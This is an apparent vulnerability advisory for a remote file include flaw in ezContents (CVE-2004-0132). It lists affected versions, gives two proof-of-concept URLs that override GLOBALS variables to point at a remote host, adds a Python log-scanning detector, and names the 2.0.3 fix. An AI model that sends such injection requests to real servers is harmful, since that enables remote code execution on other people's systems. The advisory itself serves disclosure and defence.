VisualShapers ezContents Multiple Module File Include Vulnerability
BID:9638
Info
| Bugtraq ID: | 9638 |
| Class: | Input Validation Error |
| CVE: | CVE-2004-0132 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 11 2004 12:00AM |
| Updated: | Jul 12 2009 02:06AM |
| Credit: | The disclosure of this issue has been credited to Cedric Cochin. |
| Vulnerable: | VisualShapers ezContents 2.0.2, 2.0.1, 2.0 rc3, 2.0 rc2, 2.0 rc1, 1.45 b, 1.44, 1.43, 1.42, 1.41, 1.40, 1.4.5 |
| Not Vulnerable: | VisualShapers ezContents 2.0.3 |
Discussion
It has been reported that ezContents may be prone to a file include vulnerability in multiple modules. The problem reportedly exists because remote users may influence the 'GLOBALS[rootdp]' and 'GLOBALS[language_home]' variables in the 'db.php' and 'archivednews.php' modules.
This vulnerability is reported to affect ezContents 2.0.2 and prior running on PHP 4.3.0 or above.
Exploit / POC
No exploit is required.
The following proof of concept has been provided:
http://www.example.com/[ezContents_directory]/include/db.php?GLOBALS[rootdp]=http://www.example.com/
http://www.example.com/[ezContents_directory]/modules/news/archivednews.php?GLOBALS[language_home]=http://www.example.com/&GLOBALS[gsLanguage]=ezContents
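A detection sketch added here (not part of the original advisory): it scans web access-log lines for query parameters that try to set `GLOBALS[...]` entries, the request shape shown in the proof of concept above. The log lines, client addresses and the `/ez/` install path are constructed sample data, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Modules named in the advisory; the install prefix varies per site.
MODULES = ("/include/db.php", "/modules/news/archivednews.php")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.I)

def inspect_line(line):
    """Return a finding dict for a suspicious access-log line, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # parse_qsl percent-decodes names and values, so GLOBALS%5Brootdp%5D is caught too.
    params = parse_qsl(url.query, keep_blank_values=True)
    overrides = [(k, v) for k, v in params
                 if k == "GLOBALS" or k.startswith("GLOBALS[")]
    if not overrides:
        return None
    return {
        "path": url.path,
        "known_module": url.path.endswith(MODULES),  # one of the two reported modules
        "params": [k for k, _ in overrides],
        "remote_value": any(REMOTE_RE.match(v) for _, v in overrides),
    }

def scan(lines):
    """Collect findings for every matching line."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Feb/2004:10:00:01 +0000] "GET /ez/include/db.php?GLOBALS[rootdp]=http://www.example.com/ HTTP/1.1" 200 512',
    '192.0.2.10 - - [11/Feb/2004:10:00:05 +0000] "GET /ez/modules/news/archivednews.php?GLOBALS%5Blanguage_home%5D=http%3A%2F%2Fwww.example.com%2F&GLOBALS%5BgsLanguage%5D=ezContents HTTP/1.1" 200 734',
    '198.51.100.7 - - [11/Feb/2004:10:01:12 +0000] "GET /ez/modules/news/archivednews.php?page=2 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only the request line is inspected, so parameters sent in a POST body do not appear in this kind of log and need a separate data source.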
Solution / Fix
Solution:
The vendor has released ezContents 2.0.3 to address this issue. Users are advised to upgrade to the fixed version.
The same fixed release applies to every affected version (VisualShapers ezContents 1.4.5, 1.40, 1.41, 1.42, 1.43, 1.44, 1.45 b, 2.0 rc2, 2.0 rc3, 2.0 rc1, 2.0.1, 2.0.2):
- VisualShapers ezContents203.tar.gz
  http://www.ezcontentsdev.org/ezContents203.tar.gz
References
References:
- Home Page (VisualShapers)
- PHP Code Injection Vulnerabilities in ezContents 2.0.2 and prior (Cedric Cochin)